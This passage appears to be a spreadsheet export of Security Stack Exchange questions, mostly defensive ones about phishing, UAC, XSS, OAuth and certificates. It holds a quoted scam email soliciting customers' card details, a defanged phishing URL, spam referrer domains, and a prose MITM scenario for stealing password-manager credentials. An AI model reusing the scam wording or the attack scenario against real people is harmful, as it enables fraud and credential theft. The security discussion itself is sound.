 &lt;p&gt;To prevent the bypasses, a more secure strategy is to have two separate user accounts, one admin and one non-admin, for the user. Then there's no UAC bypass, except for occasional privilege escalation vulnerabilities (much more rare than intra-account UAC bypasses) found in Windows.&lt;/p&gt;
 &lt;p&gt;Unfortunately, that more secure strategy is also more of a hassle, because the user must enter a password every time he gets an elevation prompt, instead of just clicking a button. So my idea is this: have both the admin and the non-admin account share the same password. When the admin account password-entry prompt is displayed, if the user just clicks OK with a blank password, Windows should first try using the (already logged in, of course) non-admin account's password by default.&lt;/p&gt;
 &lt;p&gt;Of course, you can already create two accounts with the same password. The change I'm proposing is an enhancement to the elevation mechanism, to optimistically assume that you did use the same password for both accounts.&lt;/p&gt;
 &lt;p&gt;It seems this would combine the UX convenience of a single account (just click a button to elevate) with the security of separate accounts. My question is: is that actually true? If not, what did I miss? E.g. the kind of answer I'm looking for is: Your idea is broken because... (insert my logic error here).&lt;/p&gt;
 &lt;p&gt;As an additional benefit over the standard strategy of separate accounts with separate passwords, my idea would prevent password phishing by non-elevated malware, since the user is conditioned to just click a button, not enter his password in elevation prompts.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;windows&gt;&lt;uac&gt;&lt;ux&gt;</t>
  </si>
  <si>
    <t>What security exposure (if any) can result from lots of apparently odd referrers in server log</t>
  </si>
  <si>
    <t>&lt;p&gt;I see relatively many referrers such as the following (as reported by Webalizer) in a web server log. The server is located outside Russia and it's a small one.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; 8 3 http://tiandeural.ru/ 
  19 3 http://timetorest.biz/ 
  20 3 http://vigrx-original.ru/ 
  21 3 http://www.rukinolenta.ru/
  22 2 http://www.arenda.triumf-realty.ru/
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;What is going on here? Why are all these entities (or single entity) taking the trouble of referring (perhaps even linking) to the site? Is this some attempt to increase page ranks or an attempt to draw naive admins to (perhaps) phishing sites? In any case, the pattern looks suspicious and I am wondering if there is any better reaction than just ignoring such blocks of apparently odd refer(r)ers.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;webserver&gt;&lt;logging&gt;&lt;referer&gt;</t>
  </si>
  <si>
    <t>Are e-mails that have a name slightly different from the web page legitimate e-mails?</t>
  </si>
  <si>
    <t>&lt;p&gt;I usually receive e-mails from an organization called Change.org, that is a site for create on-line petitions (it's site is &lt;a href="https://www.change.org/" rel="nofollow noreferrer"&gt;https://www.change.org/&lt;/a&gt;).&lt;/p&gt;
 &lt;p&gt;The thing is, they send me e-mails with suggestions about petitions to sign in, but the sender's email is change@f.change.org.
 I started to think about this e-mail and I'm thinking if it's a legitimate e-mail or not, because the &amp;quot;@f.change&amp;quot; part in the sender's email. Why there is a &amp;quot;f.&amp;quot;? Shouldn't it be just change@change.org?&lt;/p&gt;
 &lt;p&gt;I realized a lot of emails don't have exactly the same name of the web page. Is this a thing about the e-mail services that organizations or enterprises use or is a signal that is a phishing e-mail?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Why don't bigger companies buy similar domains to their main domain to prevent typosquatting?</t>
  </si>
  <si>
    <t>&lt;p&gt;One big threat out there is typosquat domains. For example instead of:
 &lt;strong&gt;steamcommunity.com&lt;/strong&gt; some malicious actor will register the domain &lt;strong&gt;stearncornmunity.com&lt;/strong&gt; and set up his fake steam login.&lt;/p&gt;
 &lt;p&gt;Why do companies not buy these &amp;quot;fake domains&amp;quot; to prevent them from being used in phishing and just redirect them to their main page? Is that such a big hassle? I believe there are tools out there that will be able to generate similar-looking links.&lt;/p&gt;
 &lt;p&gt;Wouldnt this be a great method to make the web safer for everyone?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;url&gt;&lt;social-engineering&gt;&lt;typosquatting&gt;</t>
  </si>
  <si>
    <t>Security Training for corporate Facebook users</t>
  </si>
  <si>
    <t>&lt;p&gt;One of my clients is looking at allowing their employees to access Twitter and Facebook from work. I have highlighted the need for training, and I have material to present, but what do you think should be covered?&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;disclosing customer data&lt;/li&gt;
 &lt;li&gt;disclosing internal operations/employees&lt;/li&gt;
 &lt;li&gt;social phishing&lt;/li&gt;
 &lt;li&gt;malicious link awareness&lt;/li&gt;
 &lt;li&gt;and ...&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;What would you think of a 'watchdog' policy, where if someone wants to use Facebook at work, that a member of IT Security be 'friended\following' so that there can be oversight? This would require HR feedback, to be sure, but it might give an employee pause to know that a co-worker is looking out for them (we do have access to their email and browsing histories ....). &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;corporate-policy&gt;&lt;social-engineering&gt;</t>
  </si>
  <si>
    <t>Phishing email linking to sharepoint address</t>
  </si>
  <si>
    <t>&lt;p&gt;Our organization got some sort of phishing email that contained an attachment which linked to sharepoint - ie. &lt;code&gt;https://someaddress.sharepoint.com/:b:/...&lt;/code&gt; etc. The link takes you to that "sharepoint" site with a button to click and download the pdf. &lt;/p&gt;
 &lt;p&gt;Is it possible for the website to plant a virus on the computer to compromise it, or does the file need to be downloaded in order to compromise the machine?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Email phishing scam asking customers for card details</t>
  </si>
  <si>
    <t>&lt;p&gt;I work for a small ecommerce company and over the weekend we received a few emails from customers claiming to have received an email asking them to confirm their card details to process their orders.&lt;/p&gt;
 &lt;p&gt;Here is the text from the email:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Hi Jan for some reason our payment processor could not process your order.&lt;/p&gt;
  &lt;p&gt;Can you please reply back with your card details so we can manually process your order again.&lt;/p&gt;
  &lt;p&gt;Card number -&lt;/p&gt;
  &lt;p&gt;Expiry - &lt;/p&gt;
  &lt;p&gt;Last 3 digits - &lt;/p&gt;
  &lt;p&gt;Kind regards,&lt;/p&gt;
  &lt;p&gt;Lucy Whetton&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;This email was sent from a gmail account using our company's name (company.name@gmail.com) but we do not use gmail (sales@company.name.com). We retail through ebay and our own site and our payments are processed through PayPal.&lt;/p&gt;
 &lt;p&gt;This sent us on a password changing frenzy yesterday, but today we're still receiving emails informing us of the scam. We've changed our PayPal password, the password for our email address associated with the retail site (order confirmations containing customer information are stored there) and our eBay password. We've also set our webserver to require known ssh-keys to login.&lt;/p&gt;
 &lt;p&gt;What other precautions should be taken to prevent further phishing emails affecting our customers?&lt;/p&gt;</t>
  </si>
  <si>
    <t>What is the value of multi-page login forms?</t>
  </si>
  <si>
    <t>&lt;p&gt;Various sites use a multi-page login. On the first page the user is chosen (i.e. email address), and on the second page, a password is given.&lt;/p&gt;
 &lt;p&gt;Many banks use it, Google has this also. &lt;/p&gt;
 &lt;p&gt;I first thought this could prevent phishing, but actually it would not. What makes this more secure, why are banks using it? It feels like a cargo cult to me: "they use it, we better do that too."&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://productforums.google.com/forum/#!topic/gmail/oAsE-6wmaSU" rel="nofollow noreferrer"&gt;Google also released info about it&lt;/a&gt; (this is all I found):&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;This new Google account sign-in flow will provide the following advantages:&lt;/p&gt;
  &lt;ul&gt;
  &lt;li&gt;Preparation for future authentication solutions that complement passwords&lt;/li&gt;
  &lt;li&gt;Reduced confusion among people who have multiple Google accounts&lt;/li&gt;
  &lt;li&gt;A better experience for SAML SSO users, such as university students or corporate users that sign in with a different identity provider than Google &lt;/li&gt;
  &lt;/ul&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;But that does not seem compelling to me.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;account-security&gt;</t>
  </si>
  <si>
    <t>Would trolling the people behind scams help decrease scamming?</t>
  </si>
  <si>
    <t>&lt;p&gt;It is easy for smart people to identify scams. This isn't an accident, phishers want stupid people. Sending the emails is the easy part, getting their money is what takes effort.&lt;/p&gt;
 &lt;p&gt;My question is, being an at least some what smart person, should I respond to scams as a small way to reduce phishing globally? Like, I would respond to the scam, but really be trolling the scammer?&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;How does this affect me?
 &lt;ul&gt;
 &lt;li&gt;Obviously, I don't give them information/give them ridiculous information, so I am not at risk that way&lt;/li&gt;
 &lt;/ul&gt;&lt;/li&gt;
 &lt;li&gt;Would this hurt the scammer very much?
 &lt;ul&gt;
 &lt;li&gt;If a large number of people did this, would scamming become more expensive/less effective?&lt;/li&gt;
 &lt;/ul&gt;&lt;/li&gt;
 &lt;li&gt;How long could I keep the scammer going before they realize I'm not cooperating?&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>What security holes are introduced by clicking an unknown link?</t>
  </si>
  <si>
    <t>&lt;p&gt;I recieved an email today that told me that "My account was comprised", an obvious fishing attempt, or so I thought.
 &lt;a href="https://i.stack.imgur.com/xAXF3.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/xAXF3.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;When I clicked the link, just for the fun of it, it brought me to a page which closed immediately. This got me thinking about possible exploits that could be abused without entering info or downloading a file. The hyperlink is below, and as you can see, the URL contains almost nothing that could identify me. Upon clicking, the link redirects a few times, and then closes the tab. The base site seems to be a gym, and as expected, the Site that sent the email has no proper DNS registry. &lt;/p&gt;
 &lt;p&gt;My question is this: what potential security flaws could I have been exposed to by simply clicking on an unknown link, and doing nothing else?&lt;/p&gt;
 &lt;p&gt;Email link:&lt;br&gt;
 hxxp://stile-gi.ru/administrator/components/com_falang/inferentialj.html&lt;/p&gt;</t>
  </si>
  <si>
    <t>How to indicate that content in an iframe is untrusted</t>
  </si>
  <si>
    <t>&lt;p&gt;As part of a website I am developing, untrusted content is displayed in a sandboxed iframe. The content is loaded using the &lt;code&gt;srcdoc&lt;/code&gt; attribute, but the iframe is sandboxed using &lt;code&gt;sandbox="allow-scripts"&lt;/code&gt;, so the untrusted content does not have same-origin access. However, I am concerned about malicious scripts running within the iframe. Particularly, I am concerned about phishing, since the domain displayed in the addressbar will be my website, and things like malicious alert() messages. What is a good way to either avoid this issue in the first place, or make it clear to visitors that the content is untrusted? (I can't turn off the allow-scripts permission because there are legitimate scripts that need to run in the content).&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;phishing&gt;&lt;sandbox&gt;</t>
  </si>
  <si>
    <t>No MX Records on a Possible Phishing domain?</t>
  </si>
  <si>
    <t>&lt;p&gt;I saw on my SMTP logs that it queried a possible phishing domain, I look up on its MX records and it didn't have one. Does the domain need an MX record before sending phishing emails?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;dns&gt;&lt;phishing&gt;&lt;smtp&gt;&lt;domain&gt;</t>
  </si>
  <si>
    <t>XSS - Suspicious email from Itunes - GF opened accidently</t>
  </si>
  <si>
    <t>&lt;p&gt;My GF received a random email from iTunes saying that she had started a new subscription, its a very convincing email until closer inspection. Anyway she clicked the link at the bottom to cancel it and it took her to a phishing website which looks like the apple id login page...(falm palm) This website was loaded via a proxy site which contained a random php script before forwarding to the final site.&lt;/p&gt;
 &lt;p&gt;Im a sys admin so im highly security conscious. In hindsight I wish I saved the email so I could load the link in a VM to inspect the HTML code. However I think there's a possibility it could of been an XSS or CSRF attack. &lt;/p&gt;
 &lt;p&gt;So this email and link was pressed on an iphone 6 using the safari browser built into the phone (there was no senstive webpages open on safari at that time), i have since disabled javascript and deleted all her cookies and will reformat when I get a chance later on, iv asked her to change facebook, bank, paypal passwords etc too on a different PC.&lt;/p&gt;
 &lt;p&gt;I dont know very much about iphone security, do you think this is still a threat after the steps I have taken if it is indeed an XSS and CSRF attack?&lt;/p&gt;
 &lt;p&gt;If its standard phishing, she never logged into the bogus itunes site with any credentials so im happy thats ok. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;xss&gt;&lt;csrf&gt;&lt;iphone&gt;&lt;browser-hijacking&gt;&lt;safari&gt;</t>
  </si>
  <si>
    <t>Legit zix email vs phishing</t>
  </si>
  <si>
    <t>&lt;p&gt;This morning I got a call from a user in a remote office who has received an email that purports to contain a "zix secure email" message. It directs him to a page &lt;a href="http://zixmessagecenter.com/s/e" rel="nofollow noreferrer"&gt;http://zixmessagecenter.com/s/e&lt;/a&gt; which has a place for him to enter his google mail account and password in order to decrypt the email.&lt;/p&gt;
 &lt;p&gt;Really?!?&lt;/p&gt;
 &lt;p&gt;I did some research (here, among other places) and it seems that zix is a legit company providing secure email, but I have no way to distinguish between what are their real sites and what is phishing. And "zixmessagecenter.com" certainly isn't "zixcorp.com" so I'm not sure that this is really their web site, or some rogue domain that has the artwork of some legit zix pages downloaded and put into their page.&lt;/p&gt;
 &lt;p&gt;Also, some offhand remarks and links to some stuff from 2014 suggest that at some point google was integrating zix into google mail, so should he have simply seen a legit zix message in cleartext in his google mail?&lt;/p&gt;
 &lt;p&gt;So how do I tell if this is phishing or not?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Persistent XSS in Blogger domain</t>
  </si>
  <si>
    <t>&lt;p&gt;I have discovered persistent XSS in blogger domain. I have reported vulnerability to Google Security Team and I received this is the response:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Users are permitted to place arbitrary JavaScript, Flash, Java, etc,
  in their [username].blogspot.com domains; this is by design. These
  domains are fully isolated from other Google content, and therefore,
  the risk in visiting them is no different to navigating to any other
  website on the Internet.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Note that there are no authentication cookies or other sensitive information in these domains; blog management is implemented on blogger.com, instead."&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;The domain mentioned in your submission is what we call a 'sandbox
  domain'. These are meant specifically to host user-controlled and
  potentially malicious content and are isolated from any sensitive
  data, thanks to Same Origin Policy restrictions&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;So obviously I did not received the bounty, however I would like to ask what other attack vectors can be useful for attackers in this case apart from phishing?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;attacks&gt;&lt;xss&gt;</t>
  </si>
  <si>
    <t>Is asking for credentials from a separate trusted domain an acceptable practice?</t>
  </si>
  <si>
    <t>&lt;p&gt;I know of at least two pages that I would have just assumed were a phishing scheme if I didn't know any better.&lt;/p&gt;
 &lt;p&gt;Serverfault.com is a stack exchange site on a different domain, however if you click to sign in with stack exchange, it does not redirect you, it just prompts you for user/pass.&lt;/p&gt;
 &lt;p&gt;Steam community does the same thing. Its perfectly legit, but its a different domain than the official steam page.&lt;/p&gt;
 &lt;p&gt;My perspective on this is that this is bad. If I'm being prompted to enter my facebook credentials, I expect to see the facebook.com domain. Same for steam, same for stack exchange.&lt;/p&gt;
 &lt;p&gt;Thats the advice I've been giving everyone for the longest time, and friends actually called me up about the steam community one, where I had to dig in order to find out if it was a legit site or not.&lt;/p&gt;
 &lt;p&gt;Is this a valid practice? It stinks to high heavens imo.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;phishing&gt;&lt;sub-domain&gt;</t>
  </si>
  <si>
    <t>How to stop/detect someone else registering a certificate for my domain</t>
  </si>
  <si>
    <t>&lt;p&gt;With the proliferation of low-cost automated CAs what can be done to mitigate the attack of someone doing a spear phishing attack to get a login to our webmail system, then using an automated service like RapidSSL to issue a new certificate for &lt;code&gt;widgetco.com&lt;/code&gt; to &lt;code&gt;OverlyTrustingReceptionist@widgetco.com&lt;/code&gt;?&lt;/p&gt;
 &lt;p&gt;I am sure some eyebrows would be raised at RapidSSL, if someone like &lt;code&gt;google.com&lt;/code&gt; requested a certificate. Is there anything I can do too?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;certificates&gt;&lt;certificate-authority&gt;&lt;threat-mitigation&gt;&lt;dns-domain&gt;</t>
  </si>
  <si>
    <t>Vulnerabilities despite FIDO U2F?</t>
  </si>
  <si>
    <t>&lt;p&gt;FIDO U2F seems much more secure than one-time-passwords (OTP), especially TOTP, because of the challenge-response architecture. In what ways is a U2F user still vulnerable?&lt;/p&gt;
 &lt;p&gt;I presume if a user's computer is compromised or the user loses their U2F dongle then all bets are off, right? But phishing no longer works? (I'm not an aspiring hacker, just a guy trying to understand a technology.)&lt;/p&gt;
 &lt;p&gt;EDIT: There's a related question about U2F linked to in the comments. That question asks how secure U2F is. I'm wondering specifically about vulnerabilities not fixed by U2F.&lt;/p&gt;
 &lt;p&gt;Thanks.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;chrome&gt;&lt;yubikey&gt;&lt;u2f&gt;&lt;fido&gt;</t>
  </si>
  <si>
    <t>Check emails are genuine</t>
  </si>
  <si>
    <t>&lt;p&gt;unitedstatescustoms66@gmail.com tescoextrashippingcompany147@gmail.com&lt;/p&gt;
 &lt;p&gt;I have received messages from the email letting me know about luggages and parcel being sent a soldier whom I have been talking to online. Don't know of he is real. Don't know if the email addresses are genuine. The emails requesting to pay freight fees for safekeeping of those baggages until the soldier gets to me roughly around the 4th or 5th Dec. He doesn't know that I am doing this background checks before for the freight. So please can someone find out about the email addresses.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Are most app OAuth implementations vulnerable because of an obscured URL/origin?</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;strong&gt;I cringe every time I am prompted with OAuth in an app because of the lack of ability to verify that the page is actually originating from the represented source.&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Are most app OAuth implementations exposing vulnerability because of obscured URL/origin?&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Below are OSX and iOS apps... a web view (embedded web browser viewport without address bar) is created and the OAuth page is displayed without URL or SSL certificate - which could be easily spoofed and exploited with phishing techniques. The risk seems huge.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Cobook App on OSX&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/Yh3As.jpg" alt="enter image description here"&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Trello App on iOS&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/cR3jn.jpg" alt="enter image description here"&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;oauth&gt;</t>
  </si>
  <si>
    <t>Risks of giving developers admin rights to their own PCs</t>
  </si>
  <si>
    <t>&lt;p&gt;I need to convince my internal IT department to give my new team of developers admin rights to our own PCs. They seem to think this will create some security risk to the network. Can anyone explain why this would be? What are the risks? What do IT departments usually set up for developers who need ability to install software on their PCs.&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;This question was &lt;strong&gt;&lt;a href="https://security.meta.stackexchange.com/questions/792"&gt;IT Security Question of the Week&lt;/a&gt;&lt;/strong&gt;.&lt;br/&gt;
  Read the June 8, 2012 &lt;strong&gt;&lt;a href="http://security.blogoverflow.com/2012/06/qotw-29-risks-of-giving-developers-admin-rights-to-their-own-pcs/" rel="noreferrer"&gt;blog entry&lt;/a&gt;&lt;/strong&gt; for more details or &lt;strong&gt;&lt;a href="https://security.meta.stackexchange.com/questions/tagged/qotw?sort=newest"&gt;submit your own&lt;/a&gt;&lt;/strong&gt; Question of the Week.&lt;/p&gt;
 &lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;operating-systems&gt;&lt;access-control&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How to check if redirected site like OAuth is genuine?</t>
  </si>
  <si>
    <t>&lt;p&gt;One common security advise is to open sites only from bookmarks (see also &lt;a href="https://security.stackexchange.com/questions/112383/explain-to-non-tech-savvy-person-how-to-check-that-your-connection-to-mybank-com/112386"&gt;Explain to non tech savvy person how to check that your connection to mybank.com is safe?&lt;/a&gt; ). This approach fails if a site needs a verification token from another site which requires login. (Site A redirects the user to site B with authorization request as parameter. User logs in/authorizes the request at site B. User gets redirected to site A with a verification token as parameter.) A problem arises if site A redirects the user to phishing site C which looks similar to site B and collects the user credentials.&lt;/p&gt;
 &lt;p&gt;Of course the user could in theory check if this is site B and not C. But in practice there are many problems:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;checking every character every time is annoying and will not be done after a few times&lt;/li&gt;
 &lt;li&gt;there are many similar looking characters (homographs)&lt;/li&gt;
 &lt;li&gt;authorization sites URLs are sometimes different than the main page and it is hard to remember all of them for different sites (was it my-bank.com / my-b–∞nk.com / mybank.com / my-bank.org / my-bank-auth.com / auth.my-bank.com ?)&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;So what is a userfriendly way to check if you aren't entering your credentials on a phishing site when you got there redirected?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;usability&gt;</t>
  </si>
  <si>
    <t>What to do after a co-worker has been phished?</t>
  </si>
  <si>
    <t>&lt;p&gt;One of our co-workers followed a phishing link and entered their Google for Business account credentials. We have reset their password, is there anything else we need to do? (We also used this as a reminder for everyone to enable two factor authentication.)&lt;/p&gt;
 &lt;p&gt;The mail was also sent in their name to our staff mailing list (in BCC), so I assume it was also sent to other contacts in the address book. The headers indicate it was sent via Gmail, not from an external SMTP server (we have SPF records that only allow Gmail). Can we see who else got this mail, and is it useful to send a warning to them?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Please help verify my understanding of Domain Validation (DV) SSL Certificate</t>
  </si>
  <si>
    <t>&lt;p&gt;This is what I understand so far from reading various knowledge bases and articles about DV SSL. Can anyone please help clarify if any of these is wrong?&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;DV SSL (and SSL certificate in general) is only associated with a domain name, not the IP address configured under DNS for that domain. Hence if I change the IP on my domain's A record I don't need to repurchase another SSL certificate&lt;/li&gt;
 &lt;li&gt;Most DV SSL providers (eg: GoDaddy) will verify domain name ownership by sending an email to the address registered in the domain 'whois' record&lt;/li&gt;
 &lt;li&gt;Although DV SSL is the 'lowest end' of SSL certification, as long as the private key and the email password did not fall into the wrong hand, no hacker should be able to register a DV SSL for my domain and / or setup a fake phishing website under my domain name without the browser warning the user for possible attack&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;cryptography&gt;</t>
  </si>
  <si>
    <t>Would MITM be able to manipulate the X-Frame-Option</t>
  </si>
  <si>
    <t>&lt;p&gt;I was wondering if the following scenario was realistically achievable.&lt;/p&gt;
 &lt;p&gt;We have a Network with a Computer that is used by Bob. He is security conscious person and uses a password manager. His computer is connected to the internet through a router which Bob got from his ISP. The ISP and the manufacturer of the router have not deployed updates for critical vulnerabilities that his router has.&lt;br&gt;
 Then there is Trudy who really wants to know Bobs passwords. She gets full access to his router through an exploit. There are a couple websites she is interested in so she manipulates the DNS entries to point to a webserver under her control. As Trudy has a lot of time, it is assumed that the DNS cache of Bob's computer will eventually be updated to contain the manipulated entries.&lt;/p&gt;
 &lt;p&gt;Bob happens to connect to a website Trudy is interested in. He thinks he is establishing a connection with &lt;code&gt;https://www.safewebsite.com&lt;/code&gt;, but in fact he connecting to Trudy's webserver. The webserver downgrades the connection to plain http, just to establish the connection. Then the webserver performs a redirect to the actual URL of itself, e.g. &lt;code&gt;https://safewebsite.evil.com&lt;/code&gt; for which Trudy has a valid (simple) SSL Certificate. Assuming Bob does not look too closely he doesn't see the difference in the address bar.&lt;/p&gt;
 &lt;p&gt;Alternatively Trudy gets Bob to visit her webserver in a way that does't trigger an invalid certificate exception.&lt;/p&gt;
 &lt;p&gt;What Trudy needs to do, in order to extract Bobs password, is to embed the valid website Bob wanted to visit. This also happens to be less work for Trudy as she doesn't want to code a phishing website, but wants to trick Bob's password manager. When Bob would visit Trudy's malicious website the password manager enters his credentials into the embedded website, because he believes that this is a valid connection. Then a script from Trudy's website grabs the content of the password field and username, sending both to the webserver.&lt;/p&gt;
 &lt;p&gt;Now Trudy does have a thing she is struggling with, a lot of websites have the x-frame-option set to deny. This foils Trudy's attempt in many cases. She has the idea to let the Router sniff for packets containing the x-frame-option. It would then be modified or removed. So if Bob visits Trudy's malicious website, he requests the embedded real website and the router performs an active MITM. This means the router connects to &lt;code&gt;https://www.safewebsite.com&lt;/code&gt; and only hands Bob the http version. Bob would still see the &lt;code&gt;https://safewebsite.evil.com&lt;/code&gt;, not indicating a visual change compared to the previous version of the attack. The question is if the router would be able to remove or modify the x-frame-option in a way that doesn't impact Bob's browsing experience.&lt;/p&gt;
 &lt;p&gt;Hopefully the idea is clear. If you spot something that is unrealistic, please leave a comment. Maybe you have an even simpler idea how to achieve this.&lt;/p&gt;
 &lt;p&gt;This is a attack scenario against a specific password manager (which will not be named here) that I would like to use in a presentation for a course at university, but only if it is plausible.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;&lt;br&gt;
 Even though I knew and have thought this through several times, the written idea above has a crucial flaw, &lt;code&gt;www.safewebsite.com&lt;/code&gt; would need to be loaded as https otherwise the password manager would not fill in the data. I will work on the scenario and post an updated version.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Update 2&lt;/strong&gt;&lt;br&gt;
 It seems that the password manager does have a security issue filling credentials into iframes. The scenario is flawed though and the answers given are correct for the original question. If the new scenario does work, I will first contact the developers and later release more information about the problem. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;man-in-the-middle&gt;&lt;router&gt;&lt;sslstrip&gt;</t>
  </si>
  <si>
    <t>What added value would an internal technical pentest have for a small barebones office with basic protections?</t>
  </si>
  <si>
    <t>&lt;p&gt;Assuming that a small office where basic security hygiene is already applied wants to improve their security posture, would such an office benefit from a &lt;strong&gt;technical internal pentest&lt;/strong&gt; ?&lt;/p&gt;
 &lt;p&gt;Such an office's network would be rather simple : a Domain Controller, a file server, and a few end-user workstations, all of which are regularly patched, with the external perimeter protected by a regularly patched firewall. The Domain policies notably include a strong password policy and authentication rate limiting.&lt;/p&gt;
 &lt;p&gt;No web servers are deployed, the end-users simply use desktop software to create encrypted connections towards simple database files stored on the file server.&lt;/p&gt;
 &lt;p&gt;In such a context, what value would an internal technical pentest yield ?&lt;/p&gt;
 &lt;p&gt;(phishing simulations &amp;amp; generic awareness are out of scope for this question ; assuming that those are already done on a regular basis, but out of scope anyways).
 All I can see would be network sniffing to intercept data such as NTLM hashes, that would be hard to crack anyways ; am I missing something, even with such a small attack surface ?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;penetration-test&gt;</t>
  </si>
  <si>
    <t>Can this self-XSS be extended?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a textbox which makes a call to an API everytime the text has changed. The API returns JSON but executes any Javascript within the JSON returned (tested with Alert()). This textbox value is not persistent so saving does not result in a stored XSS. If the Javascript is pasted into the textbox, it's automatically encoded and rendered safely, it's only vulnerable if the script is typed in. &lt;/p&gt;
 &lt;p&gt;Other than a phishing attack where the user types in a script into the textbox, are there any other attacks that can be performed from this point? Can this self-XSS be chained to another attack or is it essentially only valid for phishing?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;xss&gt;&lt;javascript&gt;&lt;phishing&gt;&lt;attack-vector&gt;&lt;json&gt;</t>
  </si>
  <si>
    <t>Extrapolating home address of a visitor when they click on an e-mail phishing link (Mr Robot)</t>
  </si>
  <si>
    <t>&lt;p&gt;In Mr Robot season 3, the feds are set up in a safe house spying on Elliot's internet communications (with packet sniffers?) when they intercept an email from Elliot to someone else containing a link that they think is secret information. When Elliot breaks into their safe house shortly after, they realize that clicking the link was Elliot's way of phishing them.&lt;/p&gt;
 &lt;p&gt;Does this count as phishing? How could he have derived the street address of the safe house, when usually internet visitors are identified online only by an IP address?&lt;/p&gt;
 &lt;p&gt;And if we assume the feds were smart enough to use onion routing to hide their true IP address, by what other (technical) means would Elliot have still managed to track down their street address just by luring them to an internet link?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;ip&gt;&lt;phishing&gt;&lt;tor&gt;&lt;sniffing&gt;</t>
  </si>
  <si>
    <t>Website marked as dangerous (phishing) in the past. How to get off blacklists?</t>
  </si>
  <si>
    <t>&lt;p&gt;One of our clients got his website infected almost a year ago. The site indeed contained some malicious files on the FTP server, and it got marked as dangerous, with suspicion of phishing attempts.&lt;/p&gt;
 &lt;p&gt;A couple of weeks ago we finished a brand new website for this client (there is not a single file remaining from the previous website and the database is all-new as well. The site is 100% clean.&lt;/p&gt;
 &lt;p&gt;After migrating the site to the live domain, we noticed it won't show up correctly. We were getting various errors (phishing related). I checked the Google Transparency Reports and noticed the site was marked as dangerous. I requested a security-check via Google Search Console, they reviewed the site and removed it from the database. It started working well immediately (this was a couple of weeks ago).&lt;/p&gt;
 &lt;p&gt;However, after this I noticed the site still won't load on machines with third-party antivirus and antimalware software installed. For example ESET. I reported the site as false-positive at ESET, it took them quite a few days to review it but they managed to remove it from the database.&lt;/p&gt;
 &lt;p&gt;However, I noticed the same thing for many other antimalware software - e.g. Malwarebytes, AVG, etc. I contacted the support in a few cases, but no response yet.&lt;/p&gt;
 &lt;p&gt;Another problem is: It is just one step to remove the site from the database of dangerous websites - there is always a client who needs to update his database (correct me if I am wrong).&lt;/p&gt;
 &lt;p&gt;Considering there are dozens of antivirus software solutions (not all of them have good support as Google or ESET) - is there actually a working solution for this problem, better than investing hours in talking to lots of supports? Many antivirus software won't even let you ignore the phishing warning, so unless you know how to set exceptions, you won't get to the site at all. This is really a bad scenario, considering it is an eCommerce website.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;antivirus&gt;&lt;phishing&gt;&lt;blacklist&gt;</t>
  </si>
  <si>
    <t>Why does M365 keep accepting phishing emails that Gmail rejects?</t>
  </si>
  <si>
